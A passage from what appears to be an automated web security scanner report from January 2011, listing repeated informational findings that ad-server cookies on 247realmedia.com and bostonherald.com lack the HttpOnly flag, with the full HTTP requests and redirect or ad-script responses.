Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

11.504. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

11.505. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161
...[SNIP]...

11.506. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

11.507. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

11.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

11.509. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

11.510. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

11.511. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

11.512. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:05:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

11.513. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d17efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:06:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

11.514. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d12efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.515. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d12efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; __utmb=235728274.3.10.1296308367

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n');

...[SNIP]...

11.516. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d12efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

11.517. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: NSC_d12efm_qppm_iuuq. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
